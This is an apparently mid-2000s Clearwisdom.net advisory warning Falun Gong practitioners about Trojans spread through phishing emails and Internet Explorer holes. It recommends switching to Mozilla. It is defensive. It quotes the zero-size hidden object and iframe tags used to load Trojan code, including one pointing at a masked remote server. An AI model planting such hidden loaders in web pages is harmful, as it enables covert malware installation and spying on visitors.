(Clearwisdom.net) In the recent computer virus attacks against
overseas practitioners, the attackers mainly took advantage of the security
holes in Microsoft Internet Explorer (IE). We recommend that everyone use
another Internet browser, and set it as the default browser. This will greatly
reduce the security risk. Especially for practitioners who are not familiar what
program to allow access to the Internet through the firewall, the browser
replacement should be done as soon as possible.
In this article, we will talk more about computer security, especially in the
area of IE security holes.
In the past several years, the computer attacks against Dafa practitioners
have evolved in the following order:
- Attacking overseas Dafa web sites directly from mainland China
- Attacking overseas Dafa web sites through overseas proxies
- Attacking U.S. government web sites using fake Dafa web site's identity
- Set up fake oversea proxy to trap Mainland practitioners
- Spread virus through practitioners' email. The viruses are mainly the more
popular ones that are currently spread on the Internet.
- Spy on practitioners' email communication, impersonate practitioners'
style, and send email virus as attachment.
As practitioners become more and more aware of computer security, especially
being careful about opening email attachments, these tricks are no longer
effective. They have moved on to Trojan viruses to monitor practitioners'
computer activity.
A "Trojan" is a program installed in the computer without the user
knowing. The program automatically starts whenever computer is turned on. In the
background, it monitors keyboard strokes and records any account name, password,
and address book entries. It also scans all documents and steals useful
information. Then it transmits such information to a remote machine.
Installing Trojans in the past was not easy. It required the user to run a
program (such as open an email attachment). But now, with IE security holes,
Trojans can be installed simply by visiting a web page. The evil is taking
advantage of the security hole immediately.
Their attacks have following characteristics:
- Content:
The email pretends to contain truth clarification information, for example:
"Big Trial " or "Clarify the truth through different
ways". It may say something to draw people's curiosity, such as
"UFO appears at rocket launch." It may report some internal news
such as mainland practitioner so and so being arrested.
- Web Page Link
In order to install a Trojan, reading the email content is not enough. You
must visit a web page. In the email, it often says, "Please click here
to find out the newest information". This URL leads to a web page where
the Trojan code is located. It mainly exploits the security hole in IE's
embedded object feature. If you open the web source code (VIEW SOURCE), you
should see some code like this:
object data="lhxyexe.asp" height=0 width=0
object data="lhxyhta.asp" height=0 width=0
or the code is wrapped around like this:
iframe src="mm.html" name="id" width="0"
height="0" frameborder="0"
Where the code is stored in "mm.html".
The secret is "width=0 height=0". As result of these settings, the
object is not shown on web page.
- HTML Attachment
The next, more advanced trick is using an HTML attachment, which people are
generally not suspicious about. However this HTML attachment contains the
Trojan object code. In this case, it must use the complete URL:
object data="http://xxx.xxx.xxx.xxx/lhxyexe.asp" height=0
width=0>
- Moving Trojan code server to overseas
At the beginning, the Trojan code was located at China-based websites. We
have found such servers in Shanghai, Shandong, etc. They also use some
well-known Chinese web sites to forward the user to their server. For
example, it may use the Net Ease website http://abckdkd.nease.net.
Because Net Ease provides a domain name forward service, the user is
forwarded to the server with the Trojan code.
With a firewall installed, you need to very careful if your computer tries
to visit a Chinese IP address without reason. Lately they have set up web
sites outside China. We recently found one in the U.S. and one in East Asia.
How can we protect ourselves?
The answer is rather simple. So far all of these tricks exploit security
holes in IE. Other good Internet browsers include Mozilla or Netscpae. Mozilla's
installation is simple, please visit www.mozilla.com
The key point is that Mozilla must be set as the default browser in the
computer. So when you click a URL in an email, the popup window is Mozilla-based
instead of IE-based.
Mozilla is not supported well in some multimedia web sites. In those cases,
if you are sure that the web site is safe, you may use IE to visit.
In summary, currently, discontinuing the use of IE is the best way to avoid
Trojans. Please pay special attention to this matter.